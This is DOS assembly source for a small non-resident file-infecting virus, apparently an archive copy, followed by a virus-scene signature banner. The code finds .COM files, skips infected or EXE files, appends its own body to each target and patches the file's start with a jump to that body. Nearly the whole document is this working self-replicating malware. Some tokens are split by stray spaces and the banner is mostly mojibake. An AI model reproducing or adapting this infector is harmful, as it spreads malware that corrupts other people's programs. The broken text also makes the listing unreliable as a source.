2022-08-21 09:07:57 +00:00
;****************************************************************************
;* Mini non-resident virus
;****************************************************************************
cseg seg ment
assume cs : cs eg , ds : cs eg , es : cs eg , ss : cs eg
.RADIX 16
FILELEN equ eind - start
FILNAM equ 69
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 100h
begin: db 4Dh
db 0 E9 , 4 , 0
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: db 0CDh , 20h , 0 , 0
push si ;si=0100
mov di , si
add si ,[ si + 2 ] ;si=0104
push si
movsw
movsw
pop si ;si -> start (buffer)
mov dh , 0 FF ;set DTA to FF80
call setDTA
lea dx ,[ si + FILNAM ] ;dx -> filename
mov ah , 4Eh ;find first file
infloop: int 21
cwd ;set DTA to 0080 and quit
jc setDTA
mov dx , 0FF9Eh
mov ax , 3D02h ;open the file
call int21
jc exit1
xchg bx , ax
mov ah , 3fh ;read begin of file
int 21
cmp byte ptr [ si ], 4Dh ;EXE or infected COM?
je exit2
mov al , 2 ;go to end of file
call seek
xchg ax , di
mov cl , FILELEN ;write program to end of file
mov ah , 40h
int 21
mov al , 0
call seek
mov word ptr [ si ], 0E94Dh
mov word ptr [ si + 2 ], di
mov ah , 40h
int 21
exit2: mov ah , 3Eh ;close the file
int 21
exit1: mov ah , 4Fh ;find next file
jmp short infloop
setDTA: mov dl , 80
mov ah , 1 A
int 21
ret
seek: mov ah , 42
cwd
int21: xor cx , cx
int 21
mov cl , 04
mov dx , si
return: ret
;****************************************************************************
;* Data
;****************************************************************************
filename db '*.COM' , 0
eind:
cseg ends
end begin
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>